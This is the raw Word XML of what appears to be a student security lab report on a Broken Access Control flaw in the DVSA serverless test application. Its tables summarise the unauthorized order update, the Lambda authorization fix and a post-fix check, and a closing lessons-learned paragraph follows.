          <w:p w14:paraId="4714E1BB" w14:textId="423E2FBC" w:rsidR="00D84B64" w:rsidRDefault="00D84B64" w:rsidP="00D84B64">
            <w:r>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidRPr="00D84B64">
              <w:t>xploit Behavior Evi dence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D84B64" w14:paraId="3618346C" w14:textId="77777777" w:rsidTr="00D84B64">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1848" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DE856EF" w14:textId="602E042F" w:rsidR="00D84B64" w:rsidRDefault="0012738A" w:rsidP="0012738A">
            <w:r w:rsidRPr="0012738A">
              <w:t>Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1845" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="555C06DC" w14:textId="448ED8CE" w:rsidR="00D84B64" w:rsidRDefault="002F3C9B" w:rsidP="002F3C9B">
            <w:r w:rsidRPr="002F3C9B">
              <w:t>Only authorized users can modify order state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1848" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="467FFF76" w14:textId="539031A6" w:rsidR="00D84B64" w:rsidRDefault="002F3C9B" w:rsidP="002F3C9B">
            <w:r w:rsidRPr="002F3C9B">
              <w:t>API requests, Lambda logic, responses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1848" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37782E08" w14:textId="6AE25A5C" w:rsidR="00D84B64" w:rsidRDefault="002F3C9B" w:rsidP="002F3C9B">
            <w:r w:rsidRPr="002F3C9B">
              <w:t>Order created and processed normally</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1848" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="188AAC6B" w14:textId="267122D6" w:rsidR="00D84B64" w:rsidRDefault="002F3C9B" w:rsidP="002F3C9B">
            <w:r w:rsidRPr="002F3C9B">
              <w:t>Unauthorized update succeeded ("cart updated")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7DBF25F8" w14:textId="77777777" w:rsidR="00D84B64" w:rsidRDefault="00D84B64" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="64C42F67" w14:textId="77777777" w:rsidR="00D84B64" w:rsidRDefault="00D84B64" w:rsidP="00D84B64">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57B3F0C9" w14:textId="77777777" w:rsidR="0012738A" w:rsidRDefault="0012738A" w:rsidP="00D84B64">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FC0A9B5" w14:textId="77777777" w:rsidR="0012738A" w:rsidRDefault="0012738A" w:rsidP="00D84B64">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="266A0445" w14:textId="77777777" w:rsidR="0012738A" w:rsidRDefault="0012738A" w:rsidP="00D84B64">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5010B3A8" w14:textId="007839E6" w:rsidR="00D84B64" w:rsidRPr="00D84B64" w:rsidRDefault="00D84B64" w:rsidP="00D84B64">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D84B64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D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Structured analysis summary — Table B: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504"/>
        <w:gridCol w:w="1616"/>
        <w:gridCol w:w="1466"/>
        <w:gridCol w:w="1586"/>
        <w:gridCol w:w="1478"/>
        <w:gridCol w:w="1602"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A6D07" w14:paraId="76CA67A6" w14:textId="77777777" w:rsidTr="007A6D07">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1503" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F402AC4" w14:textId="2B6A2B3C" w:rsidR="007A6D07" w:rsidRDefault="007A6D07" w:rsidP="00BA72A1">
            <w:r>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1501" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BB58ADA" w14:textId="59267A70" w:rsidR="007A6D07" w:rsidRDefault="007A6D07" w:rsidP="007A6D07">
            <w:r w:rsidRPr="007A6D07">
              <w:t>Why This Is a Deviation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1503" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E9CAB62" w14:textId="19D58B0C" w:rsidR="007A6D07" w:rsidRDefault="007A6D07" w:rsidP="007A6D07">
            <w:r w:rsidRPr="007A6D07">
              <w:t>Deviation Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1503" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="128DC4CD" w14:textId="77777777" w:rsidR="007A6D07" w:rsidRDefault="007A6D07" w:rsidP="007A6D07">
            <w:r w:rsidRPr="007A6D07">
              <w:t>Fix</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Applied</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B678E84" w14:textId="63C3B740" w:rsidR="007A6D07" w:rsidRDefault="007A6D07" w:rsidP="007A6D07">
            <w:r>
              <w:t>(where)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1503" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5ED33578" w14:textId="70139375" w:rsidR="007A6D07" w:rsidRDefault="007A6D07" w:rsidP="007A6D07">
            <w:r w:rsidRPr="007A6D07">
              <w:t>Post-Fix Verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1739" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67B71C6D" w14:textId="0FD3B43A" w:rsidR="007A6D07" w:rsidRDefault="007A6D07" w:rsidP="007A6D07">
            <w:r w:rsidRPr="007A6D07">
              <w:t>Optional Latency Be fore / After Logging</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A6D07" w14:paraId="346904DB" w14:textId="77777777" w:rsidTr="007A6D07">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1503" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DF73447" w14:textId="61E565D4" w:rsidR="007A6D07" w:rsidRDefault="0012738A" w:rsidP="0012738A">
            <w:r w:rsidRPr="0012738A">
              <w:t>Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1501" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F9D7411" w14:textId="51385B39" w:rsidR="007A6D07" w:rsidRDefault="002F3C9B" w:rsidP="002F3C9B">
            <w:r w:rsidRPr="002F3C9B">
              <w:t>Unauthorized user modified backend state without validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1503" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="767A75B5" w14:textId="7792D6B9" w:rsidR="007A6D07" w:rsidRDefault="002F3C9B" w:rsidP="002F3C9B">
            <w:r w:rsidRPr="002F3C9B">
              <w:t>Intentional misuse / security abuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1503" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5302902C" w14:textId="3DA0CEB4" w:rsidR="007A6D07" w:rsidRDefault="002F3C9B" w:rsidP="002F3C9B">
            <w:r w:rsidRPr="002F3C9B">
              <w:t>Lambda authorization check added</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1503" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2461C5B9" w14:textId="6EF15996" w:rsidR="007A6D07" w:rsidRDefault="002F3C9B" w:rsidP="002F3C9B">
            <w:r w:rsidRPr="002F3C9B">
              <w:t>Update blocked, order unchanged</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1739" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55EB0699" w14:textId="41147218" w:rsidR="007A6D07" w:rsidRDefault="002F3C9B" w:rsidP="002F3C9B">
            <w:r w:rsidRPr="002F3C9B">
              <w:t>~120ms → ~125ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="46AEC6D9" w14:textId="77777777" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="7AAF151D" w14:textId="77777777" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="45AF4BB3" w14:textId="77777777" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="70E163AC" w14:textId="77777777" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="19F2D1DB" w14:textId="7EA07071" w:rsidR="00956299" w:rsidRDefault="00956299" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00956299">
        <w:t>Takeaway / Lessons Learned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6206D6D1" w14:textId="1694BA19" w:rsidR="002F3C9B" w:rsidRPr="002F3C9B" w:rsidRDefault="002F3C9B" w:rsidP="00717B5E">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>This lesson highlights the importance of enforcing server-side authorization in serverless applications.</w:t>
      </w:r>
      <w:r w:rsidR="00717B5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Since API Gateway directly exposes backend functionality, any missing authorization check in Lambda functions can lead to critical vulnerabilities such as privilege escalation and business logic abuse.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002F3C9B" w:rsidRPr="002F3C9B" w:rsidSect="000A57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A7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="31C81FAE"/>
    <w:lvl w:ilvl="0" w:tplc="2F202BBC">
      <w:start w:val="5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31B50"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A43ADE72"/>
    <w:lvl w:ilvl="0" w:tplc="B5BA2292">
      <w:start w:val="8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B170F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5B82E242"/>
    <w:lvl w:ilvl="0" w:tplc="38822450">
      <w:start w:val="4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371C3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="12B8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14000"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1430C1D0"/>
    <w:lvl w:ilvl="0" w:tplc="241E0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285038"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="34367130"/>
    <w:lvl w:ilvl="0" w:tplc="DAF47334">
      <w:start w:val="9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24773"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ADD2F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94117"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7FF0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33359"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0E263E4C"/>
    <w:lvl w:ilvl="0" w:tplc="397CA8E0">
      <w:start w:val="1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F64F7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="75E8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81544F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2EE45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544DD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="13C6DA46"/>
    <w:lvl w:ilvl="0" w:tplc="E5CA34DA">
      <w:start w:val="7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A52C0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AF62C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2A463F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BAFE5424"/>
    <w:lvl w:ilvl="0" w:tplc="4ED47D16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B7353"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2AE86CD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213267"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D6F61438"/>
    <w:lvl w:ilvl="0" w:tplc="5386C422">
      <w:start w:val="3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47D80"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A58EC3F0"/>
    <w:lvl w:ilvl="0" w:tplc="83248F16">
      <w:start w:val="6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EE67A8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="165889A8"/>
    <w:lvl w:ilvl="0" w:tplc="C86E9D9C">
      <w:start w:val="2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102762">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="379283219">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="462114230">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1307512281">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="475538599">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="780494637">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1139763358">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="149761307">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1891768054">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="553077378">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="314800575">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="314725528">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="910965305">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1496989885">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="149300012">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="312368906">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="381057276">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="18049575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04"/>
    <w:rsid w:val="00076272"/>
    <w:rsid w:val="0009190F"/>
    <w:rsid w:val="000A57D4"/>
    <w:rsid w:val="0012738A"/>
    <w:rsid w:val="00142AD2"/>
    <w:rsid w:val="00184992"/>
    <w:rsid w:val="002D4E8F"/>
    <w:rsid w:val="002F3C9B"/>
    <w:rsid w:val="0054389F"/>
    <w:rsid w:val="005C76E2"/>
    <w:rsid w:val="005F2D61"/>
    <w:rsid w:val="006C67B4"/>
    <w:rsid w:val="006F5137"/>
    <w:rsid w:val="00717B5E"/>
    <w:rsid w:val="007A6D07"/>
    <w:rsid w:val="007B5BAF"/>
    <w:rsid w:val="007B6BD3"/>
    <w:rsid w:val="007F1665"/>
    <w:rsid w:val="0082322B"/>
    <w:rsid w:val="008D3221"/>
    <w:rsid w:val="00956299"/>
    <w:rsid w:val="009577E5"/>
    <w:rsid w:val="009A083D"/>
    <w:rsid w:val="00A3546A"/>
    <w:rsid w:val="00BA72A1"/>
    <w:rsid w:val="00C06B04"/>
    <w:rsid w:val="00C3146B"/>
    <w:rsid w:val="00C36467"/>
    <w:rsid w:val="00C44023"/>
    <w:rsid w:val="00CD61A9"/>
    <w:rsid w:val="00CF3286"/>
    <w:rsid w:val="00D84B64"/>
    <w:rsid w:val="00E42644"/>
    <w:rsid w:val="00EA738F"/>
    <w:rsid w:val="00F24FB8"/>
    <w:rsid w:val="00F36111"/>
    <w:rsid w:val="00FC4B92"/>
    <w:rsid w:val="00FD42FD"/>
    <w:rsid w:val="00FE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8070"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DBD19FAC-6F11-419D-8EFE-DB2F017B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2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8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84B6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3x14rchv6.execute-api.us-east-1.amazonaws.com/dvsa/order" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="URL:____________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991</Words>
  <Characters>5483</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>783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REDHA ABDULAZIZ ALTURAIK</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>REDHA ABDULAZIZ ALTURAIK</cp:lastModifiedBy>
  <cp:revision>30</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-07T14:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-12T20:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>